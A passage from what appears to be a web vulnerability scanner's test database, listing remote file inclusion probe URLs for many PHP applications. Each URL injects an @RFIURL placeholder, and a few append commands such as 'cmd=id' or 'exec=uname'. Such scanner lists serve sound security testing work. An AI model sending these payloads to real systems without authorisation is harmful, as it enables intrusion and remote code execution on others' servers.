list.\",\"\",\"\"\n\"004301\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/edi_form.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004302\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/edi_save.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004303\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/gen_form.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004304\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/gen_save.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004305\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/lin_form.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004306\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/lin_save.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004307\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/luo_form.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004308\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/luo_save.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004309\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/sog_form.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004310\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/biblioteca/sog_save.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004311\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004312\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004313\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004314\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004315\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004316\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bild.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004317\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bin/qte_init.php?qte_root=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004318\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bingoserver.php3?response_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004319\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/block.php?Include=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004320\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/blocks/birthday.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004321\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/blocks/events.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004322\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/blocks/help.php?full_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004323\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/blogcms/admin/media.php?DIR_LIBS=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004324\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/blogcms/admin/xmlrpc/server.php?DIR_LIBS=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004325\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/blogcms/index.php?DIR_PLUGINS=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004326\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/board/post.php?qb_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004327\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/boitenews4/index.php?url_index=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004328\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/books/allbooks.php?home=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004329\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/books/home.php?home=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004330\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/books/mybooks.php?home=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004331\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bp_ncom.php?bnrep=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004332\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bp_ncom.php?bnrep=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004333\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bp_news.php?bnrep=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004334\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bridge/enigma/E2_header.inc.php?boarddir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004335\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bridge/yabbse.inc.php?sourcedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004336\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bridges/SMF/logout.php?path_to_smf=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004337\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bu/bu_cache.php?bu_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004338\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bu/bu_claro.php?bu_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004339\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bu/bu_parse.php?bu_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004340\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/bu/process.php?bu_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004341\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/buddy.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004342\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/builddb.php?env_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004343\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/button/settings_sql.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004344\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004345\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cal.func.php?dir_edge_lang=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004346\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/calcul-page.php?home=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004347\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/calendar.php?cfg_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004348\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/calendar.php?lang=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004349\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/calendar.php?path_to_calendar=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004350\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/calendar.php?vwar_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004351\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/calendar.php?vwar_root=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004352\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/calendar/demo/index.php?date=&v=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004353\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/calendar/payment.php?insPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004354\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/calendario/cal_insert.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004355\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/calendario/cal_save.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004356\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/calendario/cal_saveactivity.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004357\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cart.php?lang_list=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004358\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cart_content.php?cart_isp_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004359\",\"CVE-2002-2019\",\"c\",\"/catalog/includes/include_once.php?include_file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"phpWebSite or osCommerce remote File Inclusion (RFI).\",\"\",\"\"\n\"004360\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/catalogshop.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004361\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cdsagenda/modification/SendAlertEmail.php?AGE=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004362\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cfagcms/themes/default/index.php?main=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004363\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ch_readalso.php?read_xml_include=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004364\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/challenge.php?vwar_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004365\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/challenge.php?vwar_root=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004366\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/change_preferences2.php?target=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004367\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/chat.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004368\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/chat.php?my[root]=@RFIURL?cm=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004369\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/chat/adminips.php?banned_file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004370\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/chat/users_popupL.php3?From=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004371\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/checkout.php?abs_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004372\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/checkout.php?abs_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004373\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ciamos_path/modules/forum/include/config.php?module_cache_path='@RFIURL'\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004374\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/circ.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004375\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/circolari/cir_save.php?CLASSPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004376\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/citywriter/head.php?path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004377\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cl_files/index.php?path_to_calendar=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004378\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/claroline/auth/ldap/authldap.php?includePath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004379\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/claroline/phpbb/page_tail.php?includePath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004380\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004381\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/class.mysql.php?path_to_bt_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004382\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/class/Wiki/Wiki.php?c_node[class_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004383\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/class/jpcache/jpcache.php?_PSL[classdir]=@RFIURL?exec=uname\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004384\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004385\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004386\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004387\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004388\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004389\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004390\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004391\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004392\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004393\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004394\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004395\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004396\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004397\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004398\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004399\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004400\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004401\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004402\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Cache.class.php?rootdir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004403\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Customer.class.php?rootdir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004404\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Performance.class.php?rootdir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004405\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Project.class.php?rootdir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004406\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/Representative.class.php?rootdir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004407\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/User.class.php?rootdir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004408\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/admin_o.php?absolutepath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004409\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/adodbt/sql.php?classes_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004410\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/adodbt/sql.php?classes_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004411\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/board_o.php?absolutepath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004412\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/class_admin.php?PathToComment=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004413\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/class_comments.php?PathToComment=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004414\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/class_mail.inc.php?path_to_folder=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004415\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/common.php?rootdir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004416\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/core/language.php?rootdir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004417\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/dev_o.php?absolutepath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 